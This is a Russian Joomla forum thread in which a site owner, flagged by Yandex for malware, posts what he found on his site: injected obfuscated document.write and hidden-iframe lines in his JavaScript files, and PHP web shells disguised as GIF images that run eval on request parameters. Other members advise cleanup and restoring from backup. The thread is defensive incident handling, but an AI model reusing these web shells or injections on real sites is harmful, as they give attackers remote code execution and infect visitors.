Сайт содержит код, который может быть опасен для посетителей.

Тема в разделе "Вопросы безопасности", создана пользователем dimonsk, 29.03.2013.

  1. Offline

    dimonsk Пользователь

    Регистрация:
    23.09.2011
    Сообщения:
    136
    Симпатии:
    0
    Пол:
    Мужской
    Товарищи помогите...

    вчера пришло письмо в панели вебмастера:

    "На страницах сайта newregion-xm.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, порче или краже данных.

    В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

    Яндекс никак не оценивает содержание сайта и предупреждает пользователей о том, что сайт мог быть заражен без ведома его владельцев.

    Пожалуйста, удалите вредоносный код. Если при новой проверке код не будет обнаружен, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта."



    и в списке страниц есть главная страница http://newregion-xm.ru/


    но как я не смотрел код главной страницы так и не нашел ничего подозрительного кроме одного места:

    Код (PHP):
    1. <!--[if lte IE 6]><script src="/plugins/system/J2top/fixed.js" type="text/javascript"></script><![endif]-->
    2.   <script type="text/javascript">if( MooTools.version >= '1.2' ) {
    3.     window.addEvent('domready',function() {
    4.     new SmoothScroll({ duration: 250 }, window);
    5.     var gototop = $('gototop');
    6.     gototop.setStyle('opacity','0').setStyle('display','block');
    7.     });
    8.     window.addEvent('scroll',function(e) {
    9.         var gototop = $('gototop');
    10.         if(Browser.Engine.trident4) {
    11.             gototop.setStyles({
    12.                 'position': 'absolute',
    13.                 'bottom': window.getPosition().y + 10,
    14.                 'width': 100
    15.             });
    16.         }
    17.         gototop.fade((window.getScroll().y > 200) ? 'in' : 'out')
    18.     });
    19. } else {
    20.     window.addEvent('domready',function() {
    21.     $('gototop').setStyle('opacity','0');
    22.     new SmoothScroll();
    23.     var Change = new Fx.Style('gototop', 'opacity', {duration:250});
    24.     var scroll = window.getScrollTop();
    25.     if (scroll > 200){
    26.         if ($('gototop').getStyle('opacity','0') == 0){Change.start(1);$('gototop').setStyle('display','');}
    27.     }
    28.     });
    29.     window.addEvent('scroll',function(e) {
    30.     var scroll = window.getScrollTop();
    31.     var Change = new Fx.Style('gototop', 'opacity', {duration:250});
    32.     function Show(){ $('gototop').setStyle('display','');}
    33.     function Hide(){ setTimeout("$('gototop').setStyle('display','none')",250);}
    34.     if (scroll > 200){
    35.         if ($('gototop').getStyle('opacity','0') == 0){Show();Change.start(1);}
    36.     } else {
    37.         if ($('gototop').getStyle('opacity','1') == 1){Change.start(0);Hide();}
    38.     }
    39.     });
    40. }
    41. </script>




    может ли яндекс посчитать это за вирус????

    спасибо заранее...
     
  2.  
  3. Offline

    dimonsk Пользователь

    Регистрация:
    23.09.2011
    Сообщения:
    136
    Симпатии:
    0
    Пол:
    Мужской
    вот что нашел в каждом файле *.js

    Код (PHP):
    1. ;document.write(unescape(".............OOO)));



    Как это убрать из всех яваскрипт файлов?
     
    Последнее редактирование модератором: 29.03.2013
  4. CB9T
    Offline

    CB9T Преподаватель по J! Команда форума

    Регистрация:
    21.05.2010
    Сообщения:
    2 462
    Симпатии:
    303
    Пол:
    Мужской
    убрать - руками, но заново появятся, надо чистить от шелов + искать уязвимое расширение.
     
  5. Offline

    dimonsk Пользователь

    Регистрация:
    23.09.2011
    Сообщения:
    136
    Симпатии:
    0
    Пол:
    Мужской
    сделал проще - удалил все из корневой папки - и попросил ТП хостера восстановить резервные копии от 15 марта - вроде глянул в несколько фалов js - чистые
     
  6. Offline

    dimonsk Пользователь

    Регистрация:
    23.09.2011
    Сообщения:
    136
    Симпатии:
    0
    Пол:
    Мужской
    и еще вопрос - как можно (вернее чем) почистить сайт от шелов?
    и каким образом найти уязвимое расширение?
     
  7. CB9T
    Offline

    CB9T Преподаватель по J! Команда форума

    Регистрация:
    21.05.2010
    Сообщения:
    2 462
    Симпатии:
    303
    Пол:
    Мужской
    руками, мозгами и скриптами :) на форуме достаточно тем, про вирусы и их чистку.
     
  8. Offline

    dimonsk Пользователь

    Регистрация:
    23.09.2011
    Сообщения:
    136
    Симпатии:
    0
    Пол:
    Мужской
    Нашел вчера в папке /images/stories подозрительные файлы

    f1h3a.gif - ничем не открывается кроме блокнота с таким содержанием:
    Код (PHP):
    1. GIF89a1
    2. <?php
    3. if (isset($_REQUEST['p1'])) {
    4.     eval(stripslashes($_REQUEST['p1']));
    5. } else {
    6.     echo "djeu84m";
    7. }
    8. ?>


    story.gif с содержанием
    Код (PHP):
    1. GIF89a1
    2. <?php
    3. if (isset($_REQUEST['p1'])) {
    4.     eval(stripslashes($_REQUEST['p1']));
    5. } else {
    6.     echo "djeu84m";
    7. }
    8. ?>


    gif.php с содержанием
    Код (PHP):
    1. GIF89a1
    2. <?php if (isset($_REQUEST['p1'])) eval(stripslashes($_REQUEST['p1'])); ?>



    Кто нибудь может подсказать их назначение (этих файлов) и как они попали в эту папку.

    как бы сделать так чтоб в эту папку никто ничего не заталкивал не нужного??
     
  9. Offline

    dimonsk Пользователь

    Регистрация:
    23.09.2011
    Сообщения:
    136
    Симпатии:
    0
    Пол:
    Мужской
    Да, еще хотел спросить:

    в каждом *.js файле в конце такие строки:

    Код (PHP):
    1. ;document.write('<iframe style="position:fixed;top:0px;left:-500px;" src="<html>
    2. <head><title>502 Bad Gateway</title></head>
    3. <body bgcolor="white">
    4. <center><h1>502 Bad Gateway</h1></center>
    5. <hr><center>nginx</center>
    6. </body>
    7. </html>
    8. " height="350" width="250"></iframe>');


    повторяются раз 5 - 10

    что это значит и надо ли оно там?
     
  10. Offline

    dimonsk Пользователь

    Регистрация:
    23.09.2011
    Сообщения:
    136
    Симпатии:
    0
    Пол:
    Мужской
    очень помог скрипт replace.php

    нашел и заменил на пусто все эти не нужные записи в js файлах
     
  11. Offline

    dimonsk Пользователь

    Регистрация:
    23.09.2011
    Сообщения:
    136
    Симпатии:
    0
    Пол:
    Мужской
    Еще JAMSS - Joomla! Anti-Malware Scan Script - v.1.0.4 ругается на:

    Код (html):
    1. In file ./administrator/components/com_admin/admin.admin.html.php-> we found 2 occurence(s) of Pattern #18 - IFRAME element
    2. ---> Details: "Found IFRAME element in code, please check if it's a valid code."
    3.  
    4. @Offset: 7259:
    5. ... <iframe name="helpFrame" src="<?php echo $fullhelpurl .preg_replace( '#\.xml$|\.html$#', '', $page );?>" class="helpFrame" frameborder="0"></iframe>
    6.                     <?php
    7.                 } else {
    8.                     ?>
    9.                     <iframe name=" ...
    10. @Offset: 7445:
    11. ... <iframe name="helpFrame" src="<?php echo JURI::base() .'help/' .$langTag. '/' . $page;?>" class="helpFrame" frameborder="0"></iframe>
    12.                     <?php
    13.                 }
    14.                 ?>
    15.             </fieldset>
    16.         </div>
    17.  
    18.         <input type="hi ...
    19. --> ./administrator/components/com_admin/admin.admin.html.php is a file. It was last accessed: 2013-03-31T13:28:12+06:00, last changed: 2013-03-30T08:22:48+06:00, last modified: 2013-01-09T00:16:57+06:00.
    20. File permissions:0644



    это тоже вирус?
     
  12. OlegM
    Offline

    OlegM Russian Joomla! Team Команда форума

    Регистрация:
    12.04.2007
    Сообщения:
    4 356
    Симпатии:
    370
    Пол:
    Мужской
    dimonsk, скорее всего нет, судя по коду это iframe для справки joomla.
     

Поделиться этой страницей

Загрузка...